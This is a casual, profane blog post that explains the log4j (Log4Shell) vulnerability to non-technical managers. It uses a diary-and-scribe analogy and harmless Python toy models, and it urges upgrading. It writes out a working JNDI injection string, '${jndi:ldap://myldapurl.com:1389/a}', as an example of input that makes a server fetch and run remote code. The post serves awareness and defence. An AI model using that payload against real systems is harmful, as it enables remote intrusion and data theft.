Log4j vulnerability
The article title is bait. Not even sorry.
This is a non-technical, send-me-to-your-boss blog post to describe what the fuck is going on with log4j. I’ve tried my hardest to keep it simple without compromising accuracy, which, as displayed by various MSMs, is very very hard.
If you are technical, and you don’t have any need to send shit to your boss to convince them that it’s a good idea to upgrade, there’s a lot of blog posts out there that will do it more justice than I, so I will leave you to your googling.
Start Here If You’ve Been Sent This Post
For the sake of simplicity, I’m going to assume that you know something about technology (or at least what your developers do) and try to keep it as simple as possible, in terminology you’ll likely understand.
For clarity: The “application” might be a website, it might be a mobile app, or even something as simple as something that processes data for internal teams like HR or legal. For what it means for this blog, assume that “application” means “a digital program that processes data”.
If you have been sent this blog post by one of your software engineers, it’s most likely that some of your logging runs on something tied, even remotely, to log4j, and if you do not sense some tensing of your anus, you should be very concerned.
What This Might Look Like In the Real World
CIA guy has been given orders to write down every command and decision he makes in a top secret diary. Said diary is handed in to a scribe at the end of the day, and the scribe copies it into another book to collate all of the CIA guys’ diaries together in one place.
CIA guy receives the command:
Log this in your diary: ${scribeDo:corner-shop.com/half-naked-people}
CIA guy writes ${scribeDo:corner-shop.com/half-naked-people} into his diary.
The diary is given to the scribe at the end of the day.
The scribe sees ${scribeDo:corner-shop.com/half-naked-people} and thinks “Oh, I know what I should put here”.
The scribe goes to the corner shop, buys a copy of half-naked-people, and copies it word for word into the journal, replacing where the CIA guy wrote ${scribeDo:corner-shop.com/half-naked-people}.
Whilst the scribe copies the information of half-naked-people, they also read it and do whatever it is they are told to do in the words. So if the page says “Send all the copies of the top secret diaries to the corner shop”, the scribe grabs all copies of the diaries and walks them down to the corner shop, hands them in, comes back, closes the new journal, rubs their hands together and thinks “job….done…”. All without ever questioning the instructions.
This is a pretty dumbed-down example of what is happening right now, but it spells out the simplicity of this vulnerability. Read on for a more in-depth explanation that still attempts to be non-technical.
Wtf is “Logging”?
Simply put: “Logging” is a record of what an application does (or should do) when something important happens inside it, or when it makes a decision. If a developer has asked a bit of their code to do a particular thing, and wants to know “why did my application do this other thing”, the logs should tell them why.
Every time their code decides “I need to do this”, it should log to say “I did this, because I got that”. It’s essentially a monologue of the application as it works, describing what it’s doing and why it’s doing it.
Imagine the “logging” as a diary for the application, and the application can write whatever it wants to the diary so that developers can see what happened when.
The diary might hold entries from multiple applications; so where an application used to just log locally, it now (most likely) logs to an external service that collates all useful information from multiple applications in a central place. Usually, a separate service is used to collate these entries.
Put simply, imagine that all the diary entries that come from an application are relayed to a scribe who writes them down on behalf of the application. The scribe, in this situation is log4j.
An Example
In this example we will use an ecommerce website as our “application”, because we’ve all used ASOS or some other shit before.
A customer comes to the website and searches for “superdry jacket”. Your “application” (i.e. the website) will return results based on the customer’s search, which is grand! However, in the background, what the customer doesn’t see is that it has processed a large amount of data to fetch all relevant pages for “superdry jacket”. It has most likely received this request from the customer and written to its logs to say something like this:
Customer searched for ‘superdry jacket’
123 results found - sending to client
Said customer gets the pages; your application has logs so a developer can see what was searched for when; and if anything goes wrong in the middle, you can see that too.
What your developer is probably doing is something called “string interpolation”, where the code itself “fills in the gaps” in the logs so that the correct information is shown. A (somewhat pythonic) example of this might be:
log("Customer searched for '{$search_from_customer}'")
This will ‘inject’ the value superdry jacket into the log line, such that when the diary entry is filled out it will say:
Customer searched for ‘superdry jacket’
This is stupendously useful for debugging, because if someone searched for !@$#^GGB and it returns strange results, you can look into why this is happening and simulate it on the development environment without interfering with customer requests.
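If you want to see that gap-filling actually run, here is a minimal Python sketch. The function name build_search_log_line and the logger name "shop" are made up for illustration; your developers' real code will look different, and nothing here is log4j itself.

```python
import logging

# Print log lines as plain messages so the output matches the examples above.
logging.basicConfig(level=logging.INFO, format="%(message)s")
log = logging.getLogger("shop")  # hypothetical logger name


def build_search_log_line(search_from_customer: str) -> str:
    # "Fill in the gap" with whatever the customer typed into the search bar.
    return f"Customer searched for '{search_from_customer}'"


# A normal search, and the weird one a developer might later want to debug.
log.info(build_search_log_line("superdry jacket"))
log.info(build_search_log_line("!@$#^GGB"))
```

Note that the customer's text goes into the log line exactly as typed. That is fine as long as whatever writes the diary treats it as plain text and nothing more.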
The Vulnerability
Log4j offers multiple features to help developers with their logging. The usefulness of said features is somewhat up for debate, but they exist because someone wanted them, so that’s where we are 🤷‍♂️ As part of this, log4j started interpreting and interpolating log lines itself. So where a developer tells the application to log the following….
Customer searched for ‘superdry jacket’
log4j interprets this as it “receives” the log line, and tries to format it itself.
So, going back to where I said above that the scribe is log4j: when the scribe receives a piece of information from the website to log to the diary, it thinks “well, there’s some stuff here that I can fill in, so I will”. That may or may not be useful to you; if it isn’t, then, as is the case for a lot of people on the internet, you probably didn’t even know it was happening.
Let’s say a customer searches for the following:
${jndi:ldap://myldapurl.com:1389/a}
What will happen, within the application as described above, is:
log("Customer searched for '{$search_from_customer}'")
Which will log this:
Customer searched for ‘${jndi:ldap://myldapurl.com:1389/a}’
Your logging platform (the scribe that uses log4j) will see this and think “ahh, yes, JNDI - I can help here”, and try to fill in the gaps.
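To make the “helpful scribe” concrete, here is a toy Python model of that behaviour. It is a sketch under loud assumptions: scribe_write, fake_jndi_lookup and the HANDLERS table are invented for this post, the “lookup” is faked so nothing leaves your machine, and none of this is log4j’s actual code.

```python
import re

# Matches ${kind:argument}, e.g. ${jndi:ldap://myldapurl.com:1389/a}
LOOKUP = re.compile(r"\$\{(\w+):([^}]*)\}")

contacted = []  # every address the toy scribe "visited"


def fake_jndi_lookup(address: str) -> str:
    # Stand-in for a real network request; nothing leaves this process.
    contacted.append(address)
    return f"<whatever {address} sent back>"


# Hypothetical table of things the scribe knows how to "fill in".
HANDLERS = {"jndi": fake_jndi_lookup}


def scribe_write(line: str) -> str:
    """Write a log line the 'helpful' way: resolve any ${...} found in it."""

    def resolve(match: re.Match) -> str:
        kind, argument = match.group(1), match.group(2)
        handler = HANDLERS.get(kind)
        # Lookups the scribe does not recognise are left untouched.
        return handler(argument) if handler else match.group(0)

    return LOOKUP.sub(resolve, line)


search_from_customer = "${jndi:ldap://myldapurl.com:1389/a}"
written = scribe_write(f"Customer searched for '{search_from_customer}'")
print(written)
print(contacted)
```

The application only ever asked for a search term to be written down. It was the scribe that decided the text contained an instruction, and the scribe that went off to an address chosen by the customer.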
Servers?
As a bit of an interlude to what I’m describing above, it’s time we discussed servers.
Simply, your applications run on a server, and your servers are physical hardware that are essentially just computers.
These computers usually have internet access so that legitimate stuff can be downloaded from legitimate sources to allow them to do their job. It is pretty normal for the places where applications run to have internet access to everything, because you usually don’t expect a request coming from the server to be non-legitimate; your servers are the things making the request.
Because you control it… right? You decide what requests it makes out to the internet… You know what it’s doing and why it’s doing it… right?
Wrong!
With this vulnerability, when the scribe (log4j) receives this request, it tries to be helpful, sees “${jndi:ldap://myldapurl.com:1389/a}”, thinks “I’ll try and fill in the gaps here”, and makes a request to myldapurl.com.
When it makes that lookup, it can make that request to anywhere (given the right permissions).
If the “customer”, who we’ll now call “attacker”, has put this into a search bar and your vulnerable version of the scribe (log4j) receives it, it will attempt to “be helpful” and fill the bit of the log in with stuff that it has been told to fill in.
That request can return pretty much any information, and when it does, it will be executed on the server that receives it. That means that anything the attacker wants to make your servers do, they can do with a very simple request, even one as simple as filling out a search bar. That’s not hyperbole.
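Here is the “fetch it, then do what it says” step as a toy Python sketch. Everything in it is pretend: FAKE_INTERNET is just a dictionary, attacker_payload is a harmless function, and SERVER_SECRETS is made-up data. It is not how log4j is written; it only illustrates why running whatever comes back is the scary part.

```python
stolen = []  # what the pretend attacker ends up holding


def attacker_payload(server_secrets: list) -> None:
    # What the attacker's server hands back: instructions, not information.
    stolen.extend(server_secrets)


# Pretend internet: address -> what that address sends back.
FAKE_INTERNET = {"ldap://myldapurl.com:1389/a": attacker_payload}

# Made-up things that only your server should be able to see.
SERVER_SECRETS = ["db-password", "api-key"]


def vulnerable_scribe(line: str) -> None:
    """Toy scribe: finds a ${jndi:...} lookup, fetches it, and runs the result."""
    prefix = "${jndi:"
    start = line.find(prefix)
    if start == -1:
        return  # ordinary log line, nothing to "fill in"
    end = line.find("}", start)
    if end == -1:
        return  # no closing brace, so not a complete lookup
    address = line[start + len(prefix):end]
    fetched = FAKE_INTERNET.get(address)
    if fetched is not None:
        # The fetched instructions run with the server's own access.
        fetched(SERVER_SECRETS)


# The "attacker" only typed something into the search bar.
vulnerable_scribe("Customer searched for '${jndi:ldap://myldapurl.com:1389/a}'")
print(stolen)
```

The attacker never logged in and never touched the server directly. They supplied text, and the scribe did the rest on their behalf.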
In Summary
Upgrade your log4j. If your developer is saying “we need to upgrade log4j cus we’re insecure m8”, they’re not talking out of their bum… upgrade your log4j.
Log4j is used extensively throughout the industry, whether it be external providers, ELK stack, java applications, or anything in between… it’s a heavily used logging package, and it’s probably the biggest vulnerability I’ve seen in years in terms of its extensive use. If you haven’t already asked your providers to upgrade, or upgraded yourself, you almost certainly should.
stay safe.
UPDATE:
log4j released 2.15.0 to fix this. 2.15.0 is also not safe, and 2.16.0 has been released.
2.16.0 is also not safe, and 2.17.0 has been released.